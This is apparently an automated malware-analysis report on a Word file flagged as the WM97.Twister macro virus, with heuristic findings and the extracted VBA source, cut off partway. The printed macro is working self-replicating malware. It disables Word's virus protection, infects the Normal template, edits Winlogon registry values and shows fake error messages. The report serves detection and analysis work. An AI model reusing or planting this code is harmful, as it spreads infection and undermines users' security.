MALICIOUS (Risk Score: 180)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment

The sample contains a legacy WordBasic AutoOpen macro, identified by multiple heuristics as a critical finding. The AutoOpen macro is designed to execute automatically when the document is opened, and it attempts to export its own code to 'C:\Progra~1\TSR32.vxd'. This suggests the document is a loader for a secondary payload, likely delivered via spearphishing.

Heuristics (5)
- ClamAV: Doc.Trojan.Twister-10 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Twister-10
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19946 bytes |

SHA-256: 34c2c598292b768cc823b7811949fe0baba7f307da75f85a4cc4c2b371795f6d

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Twister"
Function InstNor()
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "Twister" Then
InstNor = True
End If
Next x
End Function
Function InstDok()
For x = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(x).Name = "Twister" Then
InstDok = True
End If
Next x
End Function
Sub AutoOpen()
On Error Resume Next
WordBasic.DisableAutoMacros
Application.ScreenUpdating = False: Application.ShowVisualBasicEditor = False
Application.Caption = "Micrøsøft Wørd - TwIsTeR"
Options.VirusProtection = False: Options.SaveNormalPrompt = False
Options.AllowFastSave = False: Options.BlueScreen = True
Assistant.Visible = True
Assistant.Animation = msoAnimationThinking
With Assistant.NewBalloon
.Heading = "This is WM97.Twister"
.Text = "Autor: Zerø|<LzØ>"
.Show
End With
Assistant.Visible = False
FN$ = "C:\Progra~1\TSR32.vxd"
Application.VBE.ActiveVBProject.VBComponents.Item("Twister").Export FN$
Infection
Twister
End Sub
Sub DateiDrucken()
Infection
Twister
Application.ScreenUpdating = False
Randomize
Zu$ = Int((Rnd) * 5 + 1)
Select Case Zu$
Case 1
Font$ = "Windings"
Case 2
Font$ = "Bookman Old Style"
Case 3
Font$ = "Arial"
Case 4
Font$ = "Times New Roman"
Case 5
Font$ = "System"
End Select
Selection.WholeStory
FontV$ = Selection.Font.Name
Size$ = Selection.Font.Size
Selection.Font.Name = Font$
Selection.Font.Size = Int((Rnd) * 100 + 1)
Dialogs(wdDialogFilePrint).Show
Selection.Font.Name = FonfV$
Selection.Font.Size = Size$
End Sub
Sub Infection()
On Error Resume Next
If InstNor = False Then
NormalTemplate.VBProject.VBComponents.Import FN$
End If
If InstDok = False Then
ActiveDocument.VBProject.VBComponents.Import FN$
End If
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeCaption") = "This is WM97.Twister"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeText") = "Autor: Zerø|<LzØ>"
End Sub
Sub DateiSpeichernUnter()
CheckLines
Infection
Twister
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub DateiSpeichern()
Infection
Twister
ActiveDocument.SaveAs WordBasic.[Filename$]
End Sub
Sub CheckLines()
Lines$ = Application.VBE.ActiveCodePane.CodeModule.CountOfLines
If Lines$ <> 171 Then
Infection
End If
End Sub
Sub DateiDruckenStandard()
Twister
Infection
Application.ScreenUpdating = False
WordBasic.EndOfDocument
Selection.TypeParagraph
Selection.TypeParagraph
Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
Selection.Font.ColorIndex = wdGray25
Selection.Font.Name = "Times New Roman"
Selection.Font.Size = 20
WordBasic.Insert "This is WM97.Twister"
ActiveDocument.PrintOut
End Sub
Sub DateiDokVorlagen()
Twister
Infection
MsgBox "Die zum Ausführen des Programms benötigte Datei (Word32.vxd) wurde nicht gefunden!", vbCritical, "Word Fehler:"
End Sub
Sub AnsichtCode()
Twister
Infection
MsgBox "Die zum Ausführen des Programms benötigte Datei (Word32.vxd) wurde nicht gefunden!", vbCritical, "Word Fehler:"
End Sub
Sub AnsichtVBCode()
Infection
Twister
MsgBox "Die zum Ausführen des Programms benötigte Datei (Word32.vxd) wurde nicht gefunden!", vbCritical, "Word Fehler:"
End Sub
Sub ExtrasMakro()
Infection
Twister
'Thanxs to Jack Twoflower for this great Code :}
Dim x
ReDim Combobox1__$(0)
Combobox1__$(0) = ""
ReDim Textbox1__$(0)
Textbox1__$(0) = ""
ReDim Droplistbox2__$(0)
Droplistbox2__$(0) = "Normal.dot (Globale Dokumentvorlage)"
WordBasic.BeginDialog 620, 280, "Makros"
WordBasic.Text 7, 6, 93, 13, "&Makroname:", "Text3"
WordBasic.ComboBox 7, 23, 4
... (truncated)